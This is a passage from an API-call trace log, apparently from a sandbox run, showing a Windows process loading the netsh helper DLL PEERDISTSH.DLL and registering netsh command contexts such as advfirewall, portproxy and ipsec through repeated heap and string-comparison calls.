Size=0xc60) returned 0xc80ad8 [0120.013] GetProcessHeap () returned 0xc50000 [0120.013] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc78440) returned 1 [0120.013] RegEnumValueW (in: hKey=0x10c, dwIndex=0x10, lpValueName=0xc53918, lpcchValueName=0x7f79e8, lpReserved=0x0, lpType=0x0, lpData=0xc53938, lpcbData=0x7f79ec | out: lpValueName="peerdistsh", lpcchValueName=0x7f79e8, lpType=0x0, lpData=0xc53938, lpcbData=0x7f79ec) returned 0x0 [0120.013] _wcsicmp (_String1="peerdistsh.dll", _String2="ipxmontr.dll") returned 7 [0120.013] _wcsicmp (_String1="peerdistsh.dll", _String2="ipxpromn.dll") returned 7 [0120.013] GetProcessHeap () returned 0xc50000 [0120.013] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x168) returned 0xc77d38 [0120.013] GetProcessHeap () returned 0xc50000 [0120.013] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x16) returned 0xc7c668 [0120.013] GetProcessHeap () returned 0xc50000 [0120.013] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x1e) returned 0xc777b8 [0120.013] _wcsupr (in: _String="peerdistsh.dll" | out: _String="PEERDISTSH.DLL") returned="PEERDISTSH.DLL" [0120.013] GetProcessHeap () returned 0xc50000 [0120.013] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc74ef8) returned 1 [0120.013] LoadLibraryExW (lpLibFileName="PEERDISTSH.DLL", hFile=0x0, dwFlags=0x0) returned 0x6bf60000 [0120.487] GetProcAddress (hModule=0x6bf60000, lpProcName="InitHelperDll") returned 0x6bf7d390 [0120.487] InitHelperDll () returned 0x0 [0120.488] RegisterHelper () returned 0x0 [0120.488] GetProcessHeap () returned 0xc50000 [0120.488] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xca8) returned 0xc78440 [0120.488] GetProcessHeap () returned 0xc50000 [0120.488] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc80ad8) returned 1 [0120.488] RegisterHelper () returned 0x0 [0120.488] GetProcessHeap () returned 0xc50000 [0120.488] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xcf0) returned 0xc80ad8 [0120.488] GetProcessHeap () returned 0xc50000 [0120.488] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc78440) returned 1 [0120.488] RegCloseKey (hKey=0x10c) returned 0x0 [0120.488] GetProcessHeap () returned 0xc50000 [0120.489] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc53918) returned 1 [0120.489] GetProcessHeap () returned 0xc50000 [0120.489] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc53938) returned 1 [0120.490] GetProcessHeap () returned 0xc50000 [0120.490] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x48) returned 0xc66f68 [0120.490] GetProcessHeap () returned 0xc50000 [0120.490] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0x0) returned 1 [0120.490] RegisterContext () returned 0x0 [0120.490] GetProcessHeap () returned 0xc50000 [0120.490] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x48) returned 0xc670a8 [0120.490] GetProcessHeap () returned 0xc50000 [0120.490] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0x0) returned 1 [0120.490] RegisterContext () returned 0x0 [0120.492] _wcsicmp (_String1="ras", _String2="interface") returned 9 [0120.492] _wcsicmp (_String1="ras", _String2="interface") returned 9 [0120.492] GetProcessHeap () returned 0xc50000 [0120.493] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x90) returned 0xc64b20 [0120.493] GetProcessHeap () returned 0xc50000 [0120.493] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc670a8) returned 1 [0120.847] RegisterContext () returned 0x0 [0120.847] GetProcessHeap () returned 0xc50000 [0120.847] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x48) returned 0xc670a8 [0120.848] GetProcessHeap () returned 0xc50000 [0120.848] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0x0) returned 1 [0120.848] RegisterContext () returned 0x0 [0120.848] _wcsicmp (_String1="ipv6", _String2="ip") returned 118 [0120.848] _wcsicmp (_String1="ipv6", _String2="ip") returned 118 [0120.848] GetProcessHeap () returned 0xc50000 [0120.848] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x90) returned 0xc780a0 [0120.848] GetProcessHeap () returned 0xc50000 [0120.848] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc670a8) returned 1 [0120.849] RegisterContext () returned 0x0 [0120.850] _wcsicmp (_String1="aaaa", _String2="ip") returned -8 [0120.850] _wcsicmp (_String1="aaaa", _String2="ipv6") returned -8 [0120.850] _wcsicmp (_String1="aaaa", _String2="ip") returned -8 [0120.850] GetProcessHeap () returned 0xc50000 [0120.850] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xd8) returned 0xc7cd90 [0120.850] GetProcessHeap () returned 0xc50000 [0120.850] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc780a0) returned 1 [0120.850] RegisterContext () returned 0x0 [0120.851] _wcsicmp (_String1="diagnostics", _String2="aaaa") returned 3 [0120.851] _wcsicmp (_String1="diagnostics", _String2="ip") returned -5 [0120.851] _wcsicmp (_String1="diagnostics", _String2="ipv6") returned -5 [0120.851] _wcsicmp (_String1="diagnostics", _String2="aaaa") returned 3 [0120.851] _wcsicmp (_String1="diagnostics", _String2="ip") returned -5 [0120.851] GetProcessHeap () returned 0xc50000 [0120.851] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x120) returned 0xc785e8 [0120.851] GetProcessHeap () returned 0xc50000 [0120.851] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc7cd90) returned 1 [0120.851] RegisterContext () returned 0x0 [0120.851] _wcsicmp (_String1="advfirewall", _String2="interface") returned -8 [0120.851] _wcsicmp (_String1="advfirewall", _String2="ras") returned -17 [0120.851] _wcsicmp (_String1="advfirewall", _String2="interface") returned -8 [0120.851] GetProcessHeap () returned 0xc50000 [0120.851] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xd8) returned 0xc7cd90 [0120.851] GetProcessHeap () returned 0xc50000 [0120.851] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc64b20) returned 1 [0120.851] RegisterContext () returned 0x0 [0120.851] GetProcessHeap () returned 0xc50000 [0120.851] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x48) returned 0xc670a8 [0120.852] GetProcessHeap () returned 0xc50000 [0120.852] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0x0) returned 1 [0120.852] RegisterContext () returned 0x0 [0120.852] _wcsicmp (_String1="firewall", _String2="consec") returned 3 [0120.852] _wcsicmp (_String1="firewall", _String2="consec") returned 3 [0120.852] GetProcessHeap () returned 0xc50000 [0120.852] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x90) returned 0xc64b20 [0120.852] GetProcessHeap () returned 0xc50000 [0120.852] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc670a8) returned 1 [0120.852] RegisterContext () returned 0x0 [0120.852] _wcsicmp (_String1="monitor", _String2="consec") returned 10 [0120.852] _wcsicmp (_String1="monitor", _String2="firewall") returned 7 [0120.852] _wcsicmp (_String1="monitor", _String2="consec") returned 10 [0120.852] _wcsicmp (_String1="monitor", _String2="firewall") returned 7 [0120.852] GetProcessHeap () returned 0xc50000 [0120.852] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xd8) returned 0xc78710 [0120.852] GetProcessHeap () returned 0xc50000 [0120.852] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc64b20) returned 1 [0120.853] RegisterContext () returned 0x0 [0120.853] _wcsicmp (_String1="mainmode", _String2="consec") returned 10 [0120.853] _wcsicmp (_String1="mainmode", _String2="firewall") returned 7 [0120.853] _wcsicmp (_String1="mainmode", _String2="monitor") returned -14 [0120.853] _wcsicmp (_String1="mainmode", _String2="consec") returned 10 [0120.853] _wcsicmp (_String1="mainmode", _String2="firewall") returned 7 [0120.853] _wcsicmp (_String1="mainmode", _String2="monitor") returned -14 [0120.853] GetProcessHeap () returned 0xc50000 [0120.853] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x120) returned 0xc787f0 [0120.853] GetProcessHeap () returned 0xc50000 [0120.853] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc78710) returned 1 [0120.853] RegisterContext () returned 0x0 [0120.853] _wcsicmp (_String1="dhcpclient", _String2="advfirewall") returned 3 [0120.853] _wcsicmp (_String1="dhcpclient", _String2="interface") returned -5 [0120.853] _wcsicmp (_String1="dhcpclient", _String2="ras") returned -14 [0120.853] _wcsicmp (_String1="dhcpclient", _String2="advfirewall") returned 3 [0120.853] _wcsicmp (_String1="dhcpclient", _String2="interface") returned -5 [0120.853] GetProcessHeap () returned 0xc50000 [0120.853] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x120) returned 0xc78918 [0120.854] GetProcessHeap () returned 0xc50000 [0120.854] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc7cd90) returned 1 [0120.854] RegisterContext () returned 0x0 [0120.854] _wcsicmp (_String1="lan", _String2="advfirewall") returned 11 [0120.854] _wcsicmp (_String1="lan", _String2="dhcpclient") returned 8 [0120.854] _wcsicmp (_String1="lan", _String2="interface") returned 3 [0120.854] _wcsicmp (_String1="lan", _String2="ras") returned -6 [0120.854] _wcsicmp (_String1="lan", _String2="advfirewall") returned 11 [0120.854] _wcsicmp (_String1="lan", _String2="dhcpclient") returned 8 [0120.854] _wcsicmp (_String1="lan", _String2="interface") returned 3 [0120.854] _wcsicmp (_String1="lan", _String2="ras") returned -6 [0120.854] GetProcessHeap () returned 0xc50000 [0120.854] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x168) returned 0xc78a40 [0120.854] GetProcessHeap () returned 0xc50000 [0120.854] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc78918) returned 1 [0120.857] RegisterContext () returned 0x0 [0120.857] _wcsicmp (_String1="firewall", _String2="advfirewall") returned 5 [0120.857] _wcsicmp (_String1="firewall", _String2="dhcpclient") returned 2 [0120.857] _wcsicmp (_String1="firewall", _String2="interface") returned -3 [0120.857] _wcsicmp (_String1="firewall", _String2="lan") returned -6 [0120.857] _wcsicmp (_String1="firewall", _String2="ras") returned -12 [0120.857] _wcsicmp (_String1="firewall", _String2="advfirewall") returned 5 [0120.857] _wcsicmp (_String1="firewall", _String2="dhcpclient") returned 2 [0120.857] _wcsicmp (_String1="firewall", _String2="interface") returned -3 [0120.857] GetProcessHeap () returned 0xc50000 [0120.857] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x1b0) returned 0xc78bb0 [0120.857] GetProcessHeap () returned 0xc50000 [0120.857] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc78a40) returned 1 [0120.857] RegisterContext () returned 0x0 [0120.857] _wcsicmp (_String1="bridge", _String2="advfirewall") returned 1 [0120.857] _wcsicmp (_String1="bridge", _String2="dhcpclient") returned -2 [0120.857] _wcsicmp (_String1="bridge", _String2="firewall") returned -4 [0120.858] _wcsicmp (_String1="bridge", _String2="interface") returned -7 [0120.858] _wcsicmp (_String1="bridge", _String2="lan") returned -10 [0120.858] _wcsicmp (_String1="bridge", _String2="ras") returned -16 [0120.858] _wcsicmp (_String1="bridge", _String2="advfirewall") returned 1 [0120.858] _wcsicmp (_String1="bridge", _String2="dhcpclient") returned -2 [0120.858] GetProcessHeap () returned 0xc50000 [0120.858] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x1f8) returned 0xc78918 [0120.858] GetProcessHeap () returned 0xc50000 [0120.858] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc78bb0) returned 1 [0120.858] RegisterContext () returned 0x0 [0120.858] _wcsicmp (_String1="netio", _String2="advfirewall") returned 13 [0120.858] _wcsicmp (_String1="netio", _String2="bridge") returned 12 [0120.858] _wcsicmp (_String1="netio", _String2="dhcpclient") returned 10 [0120.858] _wcsicmp (_String1="netio", _String2="firewall") returned 8 [0120.858] _wcsicmp (_String1="netio", _String2="interface") returned 5 [0120.858] _wcsicmp (_String1="netio", _String2="lan") returned 2 [0120.858] _wcsicmp (_String1="netio", _String2="ras") returned -4 [0120.858] _wcsicmp (_String1="netio", _String2="advfirewall") returned 13 [0120.858] _wcsicmp (_String1="netio", _String2="bridge") returned 12 [0120.858] _wcsicmp (_String1="netio", _String2="dhcpclient") returned 10 [0120.858] _wcsicmp (_String1="netio", _String2="firewall") returned 8 [0120.858] _wcsicmp (_String1="netio", _String2="interface") returned 5 [0120.858] _wcsicmp (_String1="netio", _String2="lan") returned 2 [0120.858] _wcsicmp (_String1="netio", _String2="ras") returned -4 [0120.858] GetProcessHeap () returned 0xc50000 [0120.858] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x240) returned 0xc78b18 [0120.858] GetProcessHeap () returned 0xc50000 [0120.858] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc78918) returned 1 [0120.859] RegisterContext () returned 0x0 [0120.859] _wcsicmp (_String1="dnsclient", _String2="advfirewall") returned 3 [0120.859] _wcsicmp (_String1="dnsclient", _String2="bridge") returned 2 [0120.859] _wcsicmp (_String1="dnsclient", _String2="dhcpclient") returned 6 [0120.859] _wcsicmp (_String1="dnsclient", _String2="firewall") returned -2 [0120.859] _wcsicmp (_String1="dnsclient", _String2="interface") returned -5 [0120.859] _wcsicmp (_String1="dnsclient", _String2="lan") returned -8 [0120.859] _wcsicmp (_String1="dnsclient", _String2="netio") returned -10 [0120.859] _wcsicmp (_String1="dnsclient", _String2="ras") returned -14 [0120.859] _wcsicmp (_String1="dnsclient", _String2="advfirewall") returned 3 [0120.859] _wcsicmp (_String1="dnsclient", _String2="bridge") returned 2 [0120.859] _wcsicmp (_String1="dnsclient", _String2="dhcpclient") returned 6 [0120.859] _wcsicmp (_String1="dnsclient", _String2="firewall") returned -2 [0120.859] GetProcessHeap () returned 0xc50000 [0120.859] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x288) returned 0xc78d60 [0120.859] GetProcessHeap () returned 0xc50000 [0120.859] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc78b18) returned 1 [0120.859] RegisterContext () returned 0x0 [0120.859] _wcsicmp (_String1="namespace", _String2="advfirewall") returned 13 [0120.859] _wcsicmp (_String1="namespace", _String2="bridge") returned 12 [0120.859] _wcsicmp (_String1="namespace", _String2="dhcpclient") returned 10 [0120.859] _wcsicmp (_String1="namespace", _String2="dnsclient") returned 10 [0120.859] _wcsicmp (_String1="namespace", _String2="firewall") returned 8 [0120.859] _wcsicmp (_String1="namespace", _String2="interface") returned 5 [0120.859] _wcsicmp (_String1="namespace", _String2="lan") returned 2 [0120.859] _wcsicmp (_String1="namespace", _String2="netio") returned -4 [0120.859] _wcsicmp (_String1="namespace", _String2="ras") returned -4 [0120.859] _wcsicmp (_String1="namespace", _String2="advfirewall") returned 13 [0120.859] _wcsicmp (_String1="namespace", _String2="bridge") returned 12 [0120.859] _wcsicmp (_String1="namespace", _String2="dhcpclient") returned 10 [0120.860] _wcsicmp (_String1="namespace", _String2="dnsclient") returned 10 [0120.860] _wcsicmp (_String1="namespace", _String2="firewall") returned 8 [0120.860] _wcsicmp (_String1="namespace", _String2="interface") returned 5 [0120.860] _wcsicmp (_String1="namespace", _String2="lan") returned 2 [0120.860] _wcsicmp (_String1="namespace", _String2="netio") returned -4 [0120.860] GetProcessHeap () returned 0xc50000 [0120.860] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x2d0) returned 0xc78918 [0120.860] GetProcessHeap () returned 0xc50000 [0120.860] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc78d60) returned 1 [0120.860] RegisterContext () returned 0x0 [0120.860] GetProcessHeap () returned 0xc50000 [0120.860] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x48) returned 0xc670a8 [0120.860] GetProcessHeap () returned 0xc50000 [0120.860] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0x0) returned 1 [0120.860] RegisterContext () returned 0x0 [0120.860] _wcsicmp (_String1="ipv6", _String2="ipv4") returned 2 [0120.860] _wcsicmp (_String1="ipv6", _String2="ipv4") returned 2 [0120.860] GetProcessHeap () returned 0xc50000 [0120.860] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x90) returned 0xc64b20 [0120.860] GetProcessHeap () returned 0xc50000 [0120.860] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc670a8) returned 1 [0120.860] RegisterContext () returned 0x0 [0120.860] _wcsicmp (_String1="6to4", _String2="ipv4") returned -51 [0120.860] _wcsicmp (_String1="6to4", _String2="ipv6") returned -51 [0120.860] _wcsicmp (_String1="6to4", _String2="ipv4") returned -51 [0120.860] GetProcessHeap () returned 0xc50000 [0120.860] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xd8) returned 0xc78710 [0120.861] GetProcessHeap () returned 0xc50000 [0120.861] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc64b20) returned 1 [0120.861] RegisterContext () returned 0x0 [0120.861] _wcsicmp (_String1="isatap", _String2="6to4") returned 51 [0120.861] _wcsicmp (_String1="isatap", _String2="ipv4") returned 3 [0120.861] _wcsicmp (_String1="isatap", _String2="ipv6") returned 3 [0120.861] _wcsicmp (_String1="isatap", _String2="6to4") returned 51 [0120.861] _wcsicmp (_String1="isatap", _String2="ipv4") returned 3 [0120.861] _wcsicmp (_String1="isatap", _String2="ipv6") returned 3 [0120.861] GetProcessHeap () returned 0xc50000 [0120.861] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x120) returned 0xc78bf0 [0120.861] GetProcessHeap () returned 0xc50000 [0120.861] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc78710) returned 1 [0120.861] RegisterContext () returned 0x0 [0120.861] _wcsicmp (_String1="teredo", _String2="6to4") returned 62 [0120.861] _wcsicmp (_String1="teredo", _String2="ipv4") returned 11 [0120.861] _wcsicmp (_String1="teredo", _String2="ipv6") returned 11 [0120.861] _wcsicmp (_String1="teredo", _String2="isatap") returned 11 [0120.861] _wcsicmp (_String1="teredo", _String2="6to4") returned 62 [0120.861] _wcsicmp (_String1="teredo", _String2="ipv4") returned 11 [0120.861] _wcsicmp (_String1="teredo", _String2="ipv6") returned 11 [0120.861] _wcsicmp (_String1="teredo", _String2="isatap") returned 11 [0120.861] GetProcessHeap () returned 0xc50000 [0120.861] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x168) returned 0xc78d18 [0120.861] GetProcessHeap () returned 0xc50000 [0120.861] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc78bf0) returned 1 [0120.862] RegisterContext () returned 0x0 [0120.862] _wcsicmp (_String1="portproxy", _String2="6to4") returned 58 [0120.862] _wcsicmp (_String1="portproxy", _String2="ipv4") returned 7 [0120.862] _wcsicmp (_String1="portproxy", _String2="ipv6") returned 7 [0120.862] _wcsicmp (_String1="portproxy", _String2="isatap") returned 7 [0120.862] _wcsicmp (_String1="portproxy", _String2="teredo") returned -4 [0120.862] _wcsicmp (_String1="portproxy", _String2="6to4") returned 58 [0120.862] _wcsicmp (_String1="portproxy", _String2="ipv4") returned 7 [0120.862] _wcsicmp (_String1="portproxy", _String2="ipv6") returned 7 [0120.862] _wcsicmp (_String1="portproxy", _String2="isatap") returned 7 [0120.862] _wcsicmp (_String1="portproxy", _String2="teredo") returned -4 [0120.862] GetProcessHeap () returned 0xc50000 [0120.862] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x1b0) returned 0xc78e88 [0120.862] GetProcessHeap () returned 0xc50000 [0120.862] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc78d18) returned 1 [0120.862] RegisterContext () returned 0x0 [0120.862] GetProcessHeap () returned 0xc50000 [0120.862] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x48) returned 0xc670a8 [0120.862] GetProcessHeap () returned 0xc50000 [0120.862] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0x0) returned 1 [0120.862] RegisterContext () returned 0x0 [0120.862] _wcsicmp (_String1="isatap", _String2="6to4") returned 51 [0120.862] _wcsicmp (_String1="isatap", _String2="6to4") returned 51 [0120.863] GetProcessHeap () returned 0xc50000 [0120.863] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x90) returned 0xc64b20 [0120.863] GetProcessHeap () returned 0xc50000 [0120.863] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc670a8) returned 1 [0120.863] RegisterContext () returned 0x0 [0120.863] _wcsicmp (_String1="portproxy", _String2="6to4") returned 58 [0120.863] _wcsicmp (_String1="portproxy", _String2="ipv4") returned 7 [0120.863] _wcsicmp (_String1="portproxy", _String2="ipv6") returned 7 [0120.863] _wcsicmp (_String1="portproxy", _String2="isatap") returned 7 [0120.863] _wcsicmp (_String1="portproxy", _String2="portproxy") returned 0 [0120.863] RegisterContext () returned 0x0 [0120.863] _wcsicmp (_String1="httpstunnel", _String2="6to4") returned 50 [0120.863] _wcsicmp (_String1="httpstunnel", _String2="ipv4") returned -1 [0120.863] _wcsicmp (_String1="httpstunnel", _String2="ipv6") returned -1 [0120.863] _wcsicmp (_String1="httpstunnel", _String2="isatap") returned -1 [0120.863] _wcsicmp (_String1="httpstunnel", _String2="portproxy") returned -8 [0120.863] _wcsicmp (_String1="httpstunnel", _String2="teredo") returned -12 [0120.863] _wcsicmp (_String1="httpstunnel", _String2="6to4") returned 50 [0120.863] _wcsicmp (_String1="httpstunnel", _String2="ipv4") returned -1 [0120.863] GetProcessHeap () returned 0xc50000 [0120.863] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x1f8) returned 0xc79040 [0120.863] GetProcessHeap () returned 0xc50000 [0120.863] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc78e88) returned 1 [0120.863] RegisterContext () returned 0x0 [0120.863] _wcsicmp (_String1="tcp", _String2="6to4") returned 62 [0120.863] _wcsicmp (_String1="tcp", _String2="httpstunnel") returned 12 [0120.863] _wcsicmp (_String1="tcp", _String2="ipv4") returned 11 [0120.864] _wcsicmp (_String1="tcp", _String2="ipv6") returned 11 [0120.864] _wcsicmp (_String1="tcp", _String2="isatap") returned 11 [0120.864] _wcsicmp (_String1="tcp", _String2="portproxy") returned 4 [0120.864] _wcsicmp (_String1="tcp", _String2="teredo") returned -2 [0120.864] _wcsicmp (_String1="tcp", _String2="6to4") returned 62 [0120.864] _wcsicmp (_String1="tcp", _String2="httpstunnel") returned 12 [0120.864] _wcsicmp (_String1="tcp", _String2="ipv4") returned 11 [0120.864] _wcsicmp (_String1="tcp", _String2="ipv6") returned 11 [0120.864] _wcsicmp (_String1="tcp", _String2="isatap") returned 11 [0120.864] _wcsicmp (_String1="tcp", _String2="portproxy") returned 4 [0120.864] _wcsicmp (_String1="tcp", _String2="teredo") returned -2 [0120.864] GetProcessHeap () returned 0xc50000 [0120.864] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x240) returned 0xc78bf0 [0120.864] GetProcessHeap () returned 0xc50000 [0120.864] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc79040) returned 1 [0120.864] RegisterContext () returned 0x0 [0120.864] _wcsicmp (_String1="http", _String2="advfirewall") returned 7 [0120.864] _wcsicmp (_String1="http", _String2="bridge") returned 6 [0120.864] _wcsicmp (_String1="http", _String2="dhcpclient") returned 4 [0120.864] _wcsicmp (_String1="http", _String2="dnsclient") returned 4 [0120.864] _wcsicmp (_String1="http", _String2="firewall") returned 2 [0120.864] _wcsicmp (_String1="http", _String2="interface") returned -1 [0120.864] _wcsicmp (_String1="http", _String2="lan") returned -4 [0120.864] _wcsicmp (_String1="http", _String2="namespace") returned -6 [0120.864] _wcsicmp (_String1="http", _String2="netio") returned -6 [0120.864] _wcsicmp (_String1="http", _String2="ras") returned -10 [0120.864] _wcsicmp (_String1="http", _String2="advfirewall") returned 7 [0120.864] _wcsicmp (_String1="http", _String2="bridge") returned 6 [0120.864] _wcsicmp (_String1="http", _String2="dhcpclient") returned 4 [0120.864] _wcsicmp (_String1="http", _String2="dnsclient") returned 4 [0120.864] _wcsicmp (_String1="http", _String2="firewall") returned 2 [0120.864] _wcsicmp (_String1="http", _String2="interface") returned -1 [0120.865] GetProcessHeap () returned 0xc50000 [0120.865] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x318) returned 0xc78e38 [0120.865] GetProcessHeap () returned 0xc50000 [0120.865] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc78918) returned 1 [0120.865] RegisterContext () returned 0x0 [0120.865] _wcsicmp (_String1="ipsec", _String2="advfirewall") returned 8 [0120.865] _wcsicmp (_String1="ipsec", _String2="bridge") returned 7 [0120.865] _wcsicmp (_String1="ipsec", _String2="dhcpclient") returned 5 [0120.865] _wcsicmp (_String1="ipsec", _String2="dnsclient") returned 5 [0120.865] _wcsicmp (_String1="ipsec", _String2="firewall") returned 3 [0120.865] _wcsicmp (_String1="ipsec", _String2="http") returned 1 [0120.865] _wcsicmp (_String1="ipsec", _String2="interface") returned 2 [0120.865] _wcsicmp (_String1="ipsec", _String2="lan") returned -3 [0120.865] _wcsicmp (_String1="ipsec", _String2="namespace") returned -5 [0120.865] _wcsicmp (_String1="ipsec", _String2="netio") returned -5 [0120.865] _wcsicmp (_String1="ipsec", _String2="ras") returned -9 [0120.865] _wcsicmp (_String1="ipsec", _String2="advfirewall") returned 8 [0120.865] _wcsicmp (_String1="ipsec", _String2="bridge") returned 7 [0120.865] _wcsicmp (_String1="ipsec", _String2="dhcpclient") returned 5 [0120.865] _wcsicmp (_String1="ipsec", _String2="dnsclient") returned 5 [0120.865] _wcsicmp (_String1="ipsec", _String2="firewall") returned 3 [0120.865] _wcsicmp (_String1="ipsec", _String2="http") returned 1 [0120.866] _wcsicmp (_String1="ipsec", _String2="interface") returned 2 [0120.866] _wcsicmp (_String1="ipsec", _String2="lan") returned -3 [0120.866] GetProcessHeap () returned 0xc50000 [0120.866] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x360) returned 0xc85158 [0120.866] GetProcessHeap () returned 0xc50000 [0120.866] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc78e38) returned 1 [0120.866] RegisterContext () returned 0x0 [0120.866] GetProcessHeap () returned 0xc50000 [0120.866] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x48) returned 0xc670a8 [0120.866] GetProcessHeap () returned 0xc50000 [0120.866] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0x0) returned 1 [0120.866] RegisterContext () returned 0x0 [0120.866] _wcsicmp (_String1="dynamic", _String2="static") returned -15 [0120.866] _wcsicmp (_String1="dynamic", _String2="static") returned -15 [0120.866] GetProcessHeap () returned 0xc50000 [0120.866] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x90) returned 0xc780a0 [0120.866] GetProcessHeap () returned 0xc50000 [0120.866] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc670a8) returned 1 [0120.866] RegisterContext () returned 0x0 [0120.866] _wcsicmp (_String1="static", _String2="dynamic") returned 15 [0120.866] _wcsicmp (_String1="static", _String2="static") returned 0 [0120.866] RegisterContext () returned 0x0 [0120.866] _wcsicmp (_String1="dynamic", _String2="dynamic") returned 0 [0120.867] RegisterContext () returned 0x0 [0120.869] _wcsicmp (_String1="wfp", _String2="advfirewall") returned 22 [0120.869] _wcsicmp (_String1="wfp", _String2="bridge") returned 21 [0120.869] _wcsicmp (_String1="wfp", _String2="dhcpclient") returned 19 [0120.869] _wcsicmp (_String1="wfp", _String2="dnsclient") returned 19 [0120.869] _wcsicmp (_String1="wfp", _String2="firewall") returned 17 [0120.869] _wcsicmp (_String1="wfp", _String2="http") returned 15 [0120.869] _wcsicmp (_String1="wfp", _String2="interface") returned 14 [0120.869] _wcsicmp (_String1="wfp", _String2="ipsec") returned 14 [0120.869] _wcsicmp (_String1="wfp", _String2="lan") returned 11 [0120.869] _wcsicmp (_String1="wfp", _String2="namespace") returned 9 [0120.869] _wcsicmp (_String1="wfp", _String2="netio") returned 9 [0120.869] _wcsicmp (_String1="wfp", _String2="ras") returned 5 [0120.869] _wcsicmp (_String1="wfp", _String2="advfirewall") returned 22 [0120.869] _wcsicmp (_String1="wfp", _String2="bridge") returned 21 [0120.869] _wcsicmp (_String1="wfp", _String2="dhcpclient") returned 19 [0120.869] _wcsicmp (_String1="wfp", _String2="dnsclient") returned 19 